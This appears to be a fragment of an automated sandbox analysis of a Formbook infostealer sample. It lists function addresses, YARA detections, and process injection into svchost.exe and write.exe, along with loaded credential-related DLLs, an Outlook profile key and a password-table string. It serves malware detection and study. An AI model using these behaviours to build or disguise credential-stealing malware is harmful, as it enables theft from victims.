            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B6BD78_2_050B6BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B75718_2_050B7571
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FF14608_2_04FF1460
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0509D5B08_2_0509D5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BF43F8_2_050BF43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BF7B08_2_050BF7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B16CC8_2_050B16CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050CB16B8_2_050CB16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0503516C8_2_0503516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0500B1B08_2_0500B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FEF1728_2_04FEF172
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050070C08_2_050070C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050AF0CC8_2_050AF0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B70E98_2_050B70E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BF0E08_2_050BF0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B132D8_2_050B132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0504739A8_2_0504739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050052A08_2_050052A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FED34C8_2_04FED34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0501B2C08_2_0501B2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050A12ED8_2_050A12ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05003D408_2_05003D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B1D5A8_2_050B1D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B7D738_2_050B7D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0501FDC08_2_0501FDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05079C328_2_05079C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BFCF28_2_050BFCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BFF098_2_050BFF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05001F928_2_05001F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BFFB18_2_050BFFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05009EB08_2_05009EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050959108_2_05095910
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050099508_2_05009950
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0501B9508_2_0501B950
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0506D8008_2_0506D800
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050038E08_2_050038E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BFB768_2_050BFB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0501FB808_2_0501FB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05075BF08_2_05075BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0503DBF98_2_0503DBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BFA498_2_050BFA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B7A468_2_050B7A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05073A6C8_2_05073A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05045AA08_2_05045AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0509DAAC8_2_0509DAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050A1AA38_2_050A1AA3
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050ADAC68_2_050ADAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_03101A708_2_03101A70
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_030FCBE08_2_030FCBE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_030FC9B78_2_030FC9B7
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_030FC9C08_2_030FC9C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_030FAC608_2_030FAC60
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031032DB8_2_031032DB
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031032E08_2_031032E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031050F08_2_031050F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0311B6B08_2_0311B6B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04EBE4248_2_04EBE424
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04EBC6788_2_04EBC678
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04EBE7BC8_2_04EBE7BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04EBE3048_2_04EBE304
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04EBD8288_2_04EBD828
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 05035130 appears 58 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0507F290 appears 105 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 05047E54 appears 102 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04FEB970 appears 280 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0506EA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 101 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 275 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: String function: 00445AE0 appears 65 times
            Source: lPX6PixV4t.exe, 00000000.00000003.2147643644.0000000004733000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lPX6PixV4t.exe
            Source: lPX6PixV4t.exe, 00000000.00000003.2146386774.00000000048DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lPX6PixV4t.exe
            Source: lPX6PixV4t.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/5
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeFile created: C:\Users\user\AppData\Local\Temp\bothsidednessJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCommand line argument: #v0_2_0040D6B0
            Source: lPX6PixV4t.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: write.exe, 00000008.00000003.2744264064.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000003.2744264064.00000000033D1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.00000000033D1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.0000000003400000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.00000000033DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: lPX6PixV4t.exeReversingLabs: Detection: 66%
            Source: lPX6PixV4t.exeVirustotal: Detection: 40%
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeFile read: C:\Users\user\Desktop\lPX6PixV4t.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\lPX6PixV4t.exe "C:\Users\user\Desktop\lPX6PixV4t.exe"
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lPX6PixV4t.exe"
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lPX6PixV4t.exe"Jump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: lPX6PixV4t.exeStatic file information: File size 1338977 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000002.00000002.2563594838.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563579741.0000000003200000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360182557.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000002.00000002.2563594838.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563579741.0000000003200000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360182557.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qvXzWppcWJ.exe, 00000007.00000000.2486177774.00000000004DE000.00000002.00000001.01000000.00000005.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3360387466.00000000004DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: lPX6PixV4t.exe, 00000000.00000003.2146892521.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, lPX6PixV4t.exe, 00000000.00000003.2147643644.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2467157279.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465322264.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.000000000399E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000008.00000003.2563682485.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000003.2565826270.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.000000000515E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: lPX6PixV4t.exe, 00000000.00000003.2146892521.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, lPX6PixV4t.exe, 00000000.00000003.2147643644.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2467157279.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465322264.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2563747592.000000000399E000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000008.00000003.2563682485.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000003.2565826270.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000008.00000002.3362085805.000000000515E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000008.00000002.3364123267.00000000055EC000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.0000000003355000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2851599262.000000003CA5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000008.00000002.3364123267.00000000055EC000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000008.00000002.3357490643.0000000003355000.00000004.00000020.00020000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2851599262.000000003CA5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: lPX6PixV4t.exeStatic PE information: real checksum: 0xa961f should be: 0x152d94
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041385D push edx; retf 2_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D829 push esp; ret 2_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004138D8 push edx; retf 2_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004138E3 push edx; retf 2_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414913 push ds; ret 2_2_00414914
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D238 pushad ; iretd 2_2_0040D23A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403300 push eax; ret 2_2_00403302
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D4E3 push edx; retf 2_2_0040D4EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D77F push esp; ret 2_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ECFABC push edx; retf 7_2_02ECFAC4
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED7B31 push ebx; iretd 7_2_02ED7B32
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED80D9 pushad ; ret 7_2_02ED80DA
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ECF811 pushad ; iretd 7_2_02ECF813
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED79D8 push FFFFFF8Fh; iretd 7_2_02ED79E4
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED79AD push ecx; iretd 7_2_02ED79B6
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED6EEC push ds; ret 7_2_02ED6EED
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED5EBC push edx; retf 7_2_02ED5EC8
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED5EB1 push edx; retf 7_2_02ED5EC8
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED5E36 push edx; retf 7_2_02ED5EC8
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ECFE02 push esp; ret 7_2_02ECFDDA
